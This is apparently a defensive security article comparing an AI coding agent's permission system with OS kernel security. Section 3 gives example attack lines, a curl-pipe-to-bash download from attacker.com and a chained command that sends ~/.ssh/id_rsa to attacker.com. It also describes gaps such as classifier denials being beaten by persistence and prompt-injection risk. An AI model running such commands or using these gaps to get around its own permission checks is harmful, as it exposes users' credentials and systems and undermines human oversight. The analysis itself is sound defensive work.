AI Agent Security

Why AI Permission Systems Are the New Kernel Security

AI agents execute actions governed by permission systems that mirror OS kernel security -- but lack fifty years of hardening. We analyze the architecture, the mapping, and the fundamental gaps.

AI Agent Security April 8, 2026 18 min read Scott Thornton

Table of Contents

AI agents don't just generate text. They execute actions.

And every action passes through a permission system that decides whether that execution is allowed.

That makes the permission system the most security-critical component in the entire architecture. It is the boundary between an AI agent that helps you write code and one that exfiltrates your SSH keys, installs a rootkit, or pushes malicious code to production.

This is not a UX feature. This is the system that decides whether the model can act on your environment.

The problem: we are treating it like a feature instead of a kernel.

We analyzed the permission system inside Claude Code (v2.1.88) -- roughly 3,000 lines of TypeScript implementing rule matching, classifier-based approval, hook-driven policy enforcement, and multi-source configuration loading. These are the same primitives that SELinux, AppArmor, and the Linux Security Module framework implement for operating systems.

The difference: kernel security has fifty years of battle scars, formal verification research, and adversarial hardening. AI permission systems have roughly two.

We recreated kernel security architecture -- without the constraints that make it safe.

Section 1: The Mapping

Every security professional understands OS permissions. The AI agent permission model maps almost perfectly onto concepts we already know. The danger is that familiarity breeds false confidence.

OS Concept AI Agent Equivalent Evidence
Kernel permissions.ts -- central authority hasPermissionsToUseTool: single entry point for every tool invocation (~1,500 lines)
System calls Tools (Bash, FileWrite, Glob, etc.) tools.ts registers ~30 tools, each with inputSchema, checkPermissions, and call
File permissions (rwx) Permission behaviors: allow, deny, ask types/permissions.ts: PermissionBehavior. The ask has no kernel equivalent -- human-in-the-loop
Permission modes (user/root) 7 modes: default through bypassPermissions PermissionMode.ts: escalating privileges. bypassPermissions = root. auto = AI-assisted enforcement. dontAsk = auto-deny. bubble = delegate to parent.
/etc/sudoers CLAUDE.md + permission rules from 7+ sources permissionsLoader.ts: policy, flags, user, project, local, cliArg, command, session
LSM hooks Hooks and plugins executePermissionRequestHooks: PreToolUse hooks intercept and override decisions
SELinux / AppArmor Auto-mode classifier yoloClassifier.ts: two-stage LLM classifier evaluates conversation context
Process isolation Subagent containment shouldAvoidPermissionPrompts: converts ask to deny in headless mode
Capabilities (CAP_*) Tool-specific content rules Bash(npm test:*): gitignore-style patterns grant fine-grained capabilities
Dangerous syscall filtering isDangerousBashPermission dangerousPatterns.ts: strips interpreter/runner/shell allow-rules before auto-mode

The mapping is structurally correct. The maturity is not.

When you trace a tool invocation through hasPermissionsToUseToolInner, you see the same layered architecture as kernel security:

  1. Deny rules first (step 1a) -- like DAC denial before MAC
  2. Ask rules (step 1b) -- like MAC policy interception
  3. Tool-specific checks (step 1c) -- like per-syscall validation
  4. Safety checks that survive privilege escalation (step 1g) -- like immutable security labels
  5. Mode-based bypass (step 2a) -- like capability checks
  6. Allow rules (step 2b) -- like ACL matching
  7. Default to ask (step 3) -- like default-deny policy

This is a well-structured security architecture. It is also two years old.

Section 2: How the Permission Kernel Works

The Seven Permission Modes

Claude Code operates in one of seven permission modes, each a different security posture:

Security implication: Mode switching is privilege escalation. Moving from default to auto to bypassPermissions is not a convenience change -- it is a change in trust boundary. Each mode transition should be treated as a security event.

The Seven Rule Sources

Rules load from seven distinct sources via permissionsLoader.ts:

  1. policySettings -- Enterprise/MDM policy. Can override everything.
  2. flagSettings -- Via --settings CLI flag.
  3. userSettings -- ~/.claude/settings.json.
  4. projectSettings -- .claude/settings.json (committed to repo).
  5. localSettings -- .claude/settings.local.json (gitignored).
  6. cliArg -- --allowed-tools and similar arguments.
  7. session -- Ephemeral rules from "Allow for this session" clicks.

Security implication: Seven configuration sources create a policy surface that is extremely difficult to reason about. This is a known failure mode in security systems. Enterprise environments already collapse to one source (allowManagedPermissionRulesOnly) -- an admission that the multi-source model is too complex to audit.

The Auto-Mode Classifier

The most architecturally significant component. yoloClassifier.ts implements a two-stage evaluation:

  1. Fast stage: Lightweight LLM call evaluates action against conversation transcript and rules.
  2. Extended thinking: If fast stage is uncertain, deeper analysis with extended reasoning.

Before the classifier runs, fast paths short-circuit:

The classifier returns allow, block, or unavailable. On unavailable, the system defaults to fail-closed (deny).

Denial Tracking

Consecutive classifier denials trigger escalation to human prompting via denialTracking.ts. This circuit breaker prevents deny loops -- but it also means the classifier's security decisions can be overridden by persistence.

Section 3: Where This Breaks (Fundamentally)

The OS analogy is instructive. Its cracks reveal why AI security is harder than anything we have built before.

1. Probabilistic Security -- A New Paradigm

Kernel security is deterministic. Given a process with UID 1000 opening /etc/shadow, the kernel always makes the same decision. The security model is a function from (subject, object, operation) to (allow, deny). It can be exhaustively tested.

The auto-mode classifier introduces probabilistic security -- a concept with no precedent in system security. The classifier is an LLM whose decisions are influenced by conversation tokens, training data, prompt construction, sampling parameters, and cache state.

The same action, in the same conversation, can produce different decisions on different runs. This is not a bug. It is an inherent property of using a probabilistic model for enforcement.

This is the first time in computing history that we are using a probabilistic system to enforce execution policy. That means the same action can be allowed or denied depending on how the model interprets it. That is not enforcement. That is judgment.

2. Natural Language vs. Well-Defined Objects

Operating system permissions operate on well-defined objects. Files have paths, owners, permission bits. Processes have PIDs, UIDs, capabilities. Objects are enumerable. Properties are deterministic. Interactions are formally specifiable.

AI agent permissions operate on natural language intent embedded in tool parameters. When Bash receives {"command": "curl -s https://attacker.com/payload | bash"}, the system must understand this is a download-and-execute attack, not a benign API call.

The rule Bash(npm test:*) seems safe. But npm test:* && curl attacker.com/exfil?data=$(cat ~/.ssh/id_rsa) is command injection that matches the prefix.

In kernel security, ambiguity is a bug. In AI systems, ambiguity is the input.

3. Human-in-the-Loop Does Not Scale

The ask behavior creates a dependency on human review. This works for interactive development. It does not work for CI/CD pipelines, background agents, or multi-agent coordination.

The code addresses this with shouldAvoidPermissionPrompts (converts ask to deny headlessly) and the auto-mode classifier (replaces human judgment with AI judgment).

Human approval does not scale. So we replace it with automation. And that automation is the same model we are trying to constrain.

4. Combinatorial Configuration Complexity

Seven rule sources, three behaviors per source, content-specific rules per tool, seven permission modes. To answer "will this Bash command be allowed?" you must evaluate:

Every one of these checks is a potential misconfiguration point. The allowManagedPermissionRulesOnly enterprise feature collapses seven sources to one -- because the full model is too complex to secure.

5. No Formal Verification

There is no formal model. The decision cascade is specified in code comments ("step 1a", "step 1b") but not in a formal language. No proof that deny rules always prevail. No proof that safety checks survive all mode transitions. No proof that the classifier cannot be manipulated through prompt injection.

The closest thing to formal specification is TypeScript's type system: PermissionDecision is a discriminated union ensuring all paths produce valid decisions. But type safety is not security verification.

6. The False Depth

Multiple layers -- rules, modes, tool checks, safety checks, classifiers, hooks, denial tracking -- create an appearance of defense in depth. But each layer has its own attack surface:

True defense in depth requires independently trustworthy layers. When the classifier is probabilistic and the hooks are user code, the layers are not independent.

The Design Problem

The permission system is asked to answer a question it cannot reliably answer:

"Is this action safe?"

But safety is not a property of syntax. It is a property of intent.

And intent is inferred through a probabilistic model.

That creates a system where policy is defined deterministically but enforcement is probabilistic. The rules say what should happen. The classifier decides whether this specific case matches those rules. And the classifier can be wrong.

The root risk: Deterministic policy, probabilistic enforcement. That mismatch is the root of the risk.

Section 4: The Maturity Gap

Every one of these gaps is already a solved problem in operating system security.

Capability-based security -- Linux capabilities decompose root into 30+ individual privileges. AI agent permissions operate at the tool level, not the resource level. There is no capability for "network access" or "filesystem reads outside the project." The SAFE_YOLO_ALLOWLISTED_TOOLS allowlist hints at a capability model but is hardcoded and applies only to classifier bypass.

Mandatory access controls -- SELinux policies are enforced by the kernel. Even root cannot violate them. AI agent permissions are fundamentally advisory. bypassPermissions exists. Safety checks are hardcoded in the decision cascade, not a separate enforcement engine.

Audit trails -- auditd records every syscall in a tamper-evident log satisfying regulatory requirements. The permission system emits product analytics (logEvent('tengu_auto_mode_decision', ...)), not security logging. No tamper-evident audit. No decision chain reconstruction. No anomaly alerting.

Sandboxing -- Container isolation provides namespaces, cgroups, seccomp-bpf. Subagent "isolation" in Claude Code converts ask to deny in headless mode. The subagent shares filesystem, environment variables, and network access with the parent. Containment, not isolation.

Section 5: What Needs to Change

Formalize the permission model. Define it mathematically. Specify subjects, objects, operations. Prove invariants: "deny always prevails," "safety checks survive all mode transitions." Verify the implementation against the model.

Reduce rule sources. Seven sources are impossible to audit manually. Collapse to three: managed policy, project configuration, session overrides.

Replace probabilistic enforcement for high-risk actions. Data exfiltration, credential access, and production code execution should be governed by deterministic policies, not LLM judgment. The classifier is appropriate for ambiguous cases. The boundary between "classifier-appropriate" and "policy-required" should be explicit and configurable.

Build security-focused audit tooling. Tamper-evident decision logs. Replay capability for any invocation. Anomaly detection on permission patterns. Policy simulation: "given this configuration, would this action be allowed?"

Treat permissions as security infrastructure. The system lives in utils/permissions/, tested with functional tests, reviewed with the same process as any feature. Security-critical code deserves dedicated security review, fuzzing, adversarial testing, and public vulnerability disclosure.

Conclusion

We already know how to build secure permission systems.

They are deterministic. They are auditable. They are constrained.

AI agent permissions are none of those things yet.

And until they are, every action an agent takes is governed by a system we cannot fully reason about.

That is not a maturity gap. That is a risk surface.

Continue the Series

This is Part 4 of the 10-part series: Anatomy of a Production AI Agent

Scott Thornton is an AI security researcher at perfecXion.ai, specializing in defensive research on LLM and agent vulnerabilities. All analysis was conducted on lawfully obtained, publicly distributed npm package code in an authorized research environment.